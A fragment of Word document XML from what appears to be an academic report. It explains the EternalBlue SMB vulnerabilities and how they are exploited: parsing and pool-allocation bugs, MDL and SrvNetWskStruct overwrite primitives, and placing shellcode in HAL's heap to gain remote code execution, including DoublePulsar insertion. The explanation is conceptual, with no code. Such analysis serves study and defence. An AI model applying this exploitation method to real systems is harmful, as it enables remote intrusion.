    </w:p>
    <w:p w14:paraId="7D412CD1" w14:textId="450A8045" w:rsidR="002B61C1" w:rsidRDefault="002B61C1" w:rsidP="000505CE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>There are many functions when transmitting files using the SMB Protocol</w:t>
      </w:r>
      <w:r w:rsidR="000505CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SMB_COM_TRANSACTION2 is one of the sub-commands allowing clients to retrieve and set Extended Attribute key/value pairs, perform directory searches</w:t>
      </w:r>
      <w:r w:rsidR="000505CE">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and allow file names that are longer than the 8.3 file format names.</w:t>
      </w:r>
      <w:r w:rsidR="000505CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00387A63">
        <w:t>SMB_COM_NT_TRANSACT extends the features offered with the above and permits data blocks with very large parameters to be transferred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC6AEAA" w14:textId="6E37775C" w:rsidR="00387A63" w:rsidRDefault="00387A63" w:rsidP="000505CE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>If the data sent during either of these commands exceeds the maximum buffer size that was created during the session</w:t>
      </w:r>
      <w:r w:rsidRPr="00387A63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set up or if the ‘total_data_to_send’ is greater than the transmitted_data then the SECONDARY sub-command is used to split the packets. An example can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00072EBE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11368A55" w14:textId="12DB55A2" w:rsidR="00072EBE" w:rsidRDefault="00072EBE" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00072EBE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E6A7F70" wp14:editId="0F0A2287">
            <wp:extent cx="6356066" cy="3928001"/>
            <wp:effectExtent l="19050" t="19050" r="26035" b="15875"/>
            <wp:docPr id="760259138" name="Picture 76025913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38" name="Picture 760259138" descr="Text&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6366242" cy="3934290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0370F15C" w14:textId="069843DC" w:rsidR="00072EBE" w:rsidRDefault="00072EBE" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc111363588"/>
      <w:bookmarkStart w:id="94" w:name="_Toc111363725"/>
      <w:bookmarkStart w:id="95" w:name="_Toc111981749"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Example of Wrong Parsing Bug</w:t>
      </w:r>
      <w:r w:rsidR="00DD62E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNGNiOWRkZjYtNTc0OS00ODgyLTgyNTgtZTQ3Mzk4ZWQyZjNh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
          <w:id w:val="1423378783"/>
          <w:placeholder>
            <w:docPart w:val="EB9CCA32BA4249328C702FE54D344D68"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="5E529124" w14:textId="2C2D8D40" w:rsidR="00387A63" w:rsidRDefault="00387A63" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9091F6" w14:textId="3B2C42F6" w:rsidR="00072EBE" w:rsidRDefault="00072EBE" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc113190708"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(C) Non-paged Pool Allocation Bug</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="15D758E3" w14:textId="3DD8AA30" w:rsidR="00072EBE" w:rsidRDefault="00072EBE" w:rsidP="000505CE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00F355F3">
        <w:t>e non-paged pool allocation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bug </w:t>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t>permits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the allocation of a specified size chunk in the kernel non-paged pool</w:t>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t xml:space="preserve">, creates </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a hole that </w:t>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filled with data, causing </w:t>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> out of bound write to the following chunk (Bug A and B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4FF37C" w14:textId="080BD0A2" w:rsidR="00567637" w:rsidRDefault="00072EBE" w:rsidP="000505CE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00DD62E8">
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t>has to</w:t>
      </w:r>
      <w:r w:rsidR="00DD62E8">
        <w:t xml:space="preserve"> send the </w:t>
      </w:r>
      <w:r>
        <w:t>SMB_COM_SESSION_SETUP</w:t>
      </w:r>
      <w:r w:rsidR="00DD62E8">
        <w:t xml:space="preserve">_ANDX request starting the user authentication to establish the SMB session on a SMB connection to enable a user logon and establish a valid UID. </w:t>
      </w:r>
      <w:r w:rsidR="00567637">
        <w:t xml:space="preserve">There are two ways of doing this and as illustrated in figures </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="00567637">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="00567637">
        <w:t xml:space="preserve"> both formats have the request split into two sections. The first section is the SMB_Parameters and the second section is the SMB_Data. In the first format the WordCount is equal to 13 whereas</w:t>
      </w:r>
      <w:r w:rsidR="00EC65FF">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="00567637">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D7AF0">
        <w:t>the second format</w:t>
      </w:r>
      <w:r w:rsidR="00EC65FF">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003D7AF0">
        <w:t xml:space="preserve"> with its extended security</w:t>
      </w:r>
      <w:r w:rsidR="00EC65FF">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003D7AF0">
        <w:t xml:space="preserve"> the WordCount is equal to 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B94BA" w14:textId="361C61ED" w:rsidR="00B90435" w:rsidRDefault="003D7AF0" w:rsidP="000505CE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>When the server performs the integrity check using SrvValidateSmb the bug, within the extraction of data section named ‘BlockingSessionSetupAndX’ becomes triggered. This calculates the ByteCount incorrectly a</w:t>
      </w:r>
      <w:r w:rsidR="00B90435">
        <w:t>nd leads to a placeholder for a big allocation that is later used by an NtFEA chuck that will again lead to an overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127D3F40" w14:textId="06026865" w:rsidR="003D7AF0" w:rsidRDefault="003D7AF0" w:rsidP="000505CE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>The pseudo code can be found in Appendix 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED7657" w14:textId="72439043" w:rsidR="00DD62E8" w:rsidRDefault="00DD62E8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DFC8FA6" wp14:editId="24873687">
            <wp:extent cx="2819400" cy="5807075"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22225"/>
            <wp:docPr id="760259139" name="Picture 760259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819400" cy="5807075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25025586" w14:textId="5E1C3560" w:rsidR="00DD62E8" w:rsidRDefault="00DD62E8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc111363589"/>
      <w:bookmarkStart w:id="98" w:name="_Toc111363726"/>
      <w:bookmarkStart w:id="99" w:name="_Toc111981750"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: LM and NTLM Authentication SMB request </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNjViNjFjNzAtMTFjNS00MDIyLTk0MTEtM2I3Njc4ZjU4NDAy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
          <w:id w:val="325631000"/>
          <w:placeholder>
            <w:docPart w:val="82DD7323F7EA4915A4766D830C41E241"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="368B39ED" w14:textId="760DD09C" w:rsidR="00DD62E8" w:rsidRDefault="00DD62E8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1858AE94" w14:textId="51EB208D" w:rsidR="00567637" w:rsidRDefault="00567637" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00567637">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7675D52C" wp14:editId="61CB5E3C">
            <wp:extent cx="3901778" cy="4953429"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="19050"/>
            <wp:docPr id="760259140" name="Picture 760259140"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40" name="Picture 760259140" descr="Text&#10;&#10;Description automatically generated with low confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3901778" cy="4953429"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="444CAB9F" w14:textId="1DCFC6E4" w:rsidR="00567637" w:rsidRDefault="00567637" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc111363590"/>
      <w:bookmarkStart w:id="101" w:name="_Toc111363727"/>
      <w:bookmarkStart w:id="102" w:name="_Toc111981751"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: NTLMv2 Authentication SMB request </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMmYwYzg3MzktN2EwZi00OTEyLTg5MTktNjQ5YzY4MzAzZDhh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
          <w:id w:val="498771192"/>
          <w:placeholder>
            <w:docPart w:val="86C928A70B2941EDA3AB438405B65E10"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="100"/>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="4D2630A9" w14:textId="7BD63071" w:rsidR="00DD62E8" w:rsidRDefault="00DD62E8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630D4840" w14:textId="3B750AB2" w:rsidR="00567637" w:rsidRDefault="002E2A38" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc113190709"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Exploitation Technique</w:t>
      </w:r>
      <w:r w:rsidR="00053642">
        <w:t xml:space="preserve"> (Primitive 1: MDL (pMdl1))</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="7FEAA455" w14:textId="366EBF64" w:rsidR="002E2A38" w:rsidRDefault="002E2A38" w:rsidP="008272B6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primitive Memory Descriptor Lists (MDL), a system-defined kernel structure describing a physical set of addresses, is used to map I/O data to specific virtual addresses. Using </w:t>
      </w:r>
      <w:r w:rsidR="00053642">
        <w:t>Bug,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A and B, there is now an Out of Bound (OOB) write srv allocation</w:t>
      </w:r>
      <w:r w:rsidR="00053642">
        <w:t xml:space="preserve"> and the header of the srv chunk can now be overwritten by client data (controlled by the attacker) wherever it is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C4A1F" w14:textId="64F13FA9" w:rsidR="00053642" w:rsidRDefault="00053642" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc113190710"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Exploitation Technique (Primitive 2: pSrvNetWskStruct)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="0D88CFFB" w14:textId="0EFA2AC1" w:rsidR="00053642" w:rsidRPr="00053642" w:rsidRDefault="00053642" w:rsidP="00106E42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="142"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">In the srvnet header the pSrvNetWskStruct points to the SrvNetWskStruct which in turn contains a pointer to theHandlerFunction, that gets called when </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>the associated srvnet connection is closed.</w:t>
      </w:r>
      <w:r w:rsidR="00F360EF">
        <w:t xml:space="preserve"> If the pointer to SrvNetWskStruct is overwritten by a fake address ‘fake SrvNetWskStruct’ with values controlled by the attacker then the value of the pointer to the function called when srvnet connection closes, the HandlerFunction, allows Remote Code Execution (RCE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E837B0" w14:textId="0435D571" w:rsidR="00805516" w:rsidRDefault="007A1C00" w:rsidP="00106E42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc113190711"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.6</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00805516">
        <w:t>Exploitation Flow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="375D2858" w14:textId="71E95208" w:rsidR="00805516" w:rsidRDefault="00805516" w:rsidP="00106E42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>Using 2.</w:t>
      </w:r>
      <w:r w:rsidR="009813B9">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.4 and 2.</w:t>
      </w:r>
      <w:r w:rsidR="009813B9">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.5 the data sent from client to server using the srvnet connection is now controlled by the attacker. If the virtual address StartVa field is overwritten within the HAL’s Heap (which has </w:t>
      </w:r>
      <w:r w:rsidR="00F776B4">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidR="00F776B4">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> permissions) and we change the pointer SrvNetWskStruct (pSrvNetWskStruct) and get them to point to the static address in HAL’s Heap</w:t>
      </w:r>
      <w:r w:rsidR="000505CE">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then the fake struct can be created preceded by shellcode. This shellcode would then be called </w:t>
      </w:r>
      <w:r w:rsidR="00FC607C">
        <w:t>when the srvnet connection was closed thus achieving RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123B669F" w14:textId="7E077899" w:rsidR="009306E9" w:rsidRDefault="009306E9" w:rsidP="00106E42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Figures </w:t>
      </w:r>
      <w:r w:rsidR="00F776B4">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00106E42">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00475C95">
        <w:t>-36</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrate the process</w:t>
      </w:r>
      <w:r w:rsidR="00F776B4">
        <w:t xml:space="preserve"> of the insertion of Double Pulsar using the EternalBlue bugs</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51572D3C" w14:textId="3C035061" w:rsidR="00FC607C" w:rsidRDefault="009306E9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
      </w:pPr>
      <w:r w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254E9A0C" wp14:editId="363BD4DE">
            <wp:extent cx="6736464" cy="1776857"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="13970"/>
            <wp:docPr id="760259142" name="Picture 760259142"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42" name="Picture 760259142" descr="Diagram&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId41"/>
                    <a:srcRect t="3768"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6795513" cy="1792432"/>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662F5D59" w14:textId="3AAA2B22" w:rsidR="00863F67" w:rsidRDefault="00863F67" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc111363591"/>
      <w:bookmarkStart w:id="107" w:name="_Toc111363728"/>
      <w:bookmarkStart w:id="108" w:name="_Toc111981752"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Initial state of HAL's Heap non-paged kernel pool</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="3751EE4A" w14:textId="2F126862" w:rsidR="009306E9" w:rsidRDefault="009306E9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703B533C" w14:textId="02F9D82A" w:rsidR="00863F67" w:rsidRDefault="00863F67" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C381854" w14:textId="4F0A2116" w:rsidR="007B24F0" w:rsidRDefault="007B24F0" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F99D39F" w14:textId="77777777" w:rsidR="007B24F0" w:rsidRDefault="007B24F0" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:sectPr w:rsidR="007B24F0">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A42946" w14:textId="1EFCE18A" w:rsidR="007B24F0" w:rsidRDefault="009813B9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E2381A">
        <w:t xml:space="preserve">Following </w:t>
      </w:r>
      <w:r w:rsidR="00543816">
        <w:t>Bugs,</w:t>
      </w:r>
      <w:r w:rsidR="00E2381A">
        <w:t xml:space="preserve"> A and B the srv allocation has only the Os2Fea transmission connection open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD0038E" w14:textId="3C772F0A" w:rsidR="009306E9" w:rsidRDefault="009306E9" w:rsidP="009813B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E36BA65" wp14:editId="33180CA2">
            <wp:extent cx="8760740" cy="3387065"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="23495"/>
            <wp:docPr id="760259143" name="Picture 760259143"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43" name="Picture 760259143" descr="A picture containing table&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId42"/>
                    <a:srcRect l="2422" t="2316" r="1035" b="4669"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8813367" cy="3407412"/>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3545DC9" w14:textId="3BF8EEEB" w:rsidR="00863F67" w:rsidRDefault="00863F67" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc111363592"/>
      <w:bookmarkStart w:id="110" w:name="_Toc111363729"/>
      <w:bookmarkStart w:id="111" w:name="_Toc111981753"/>
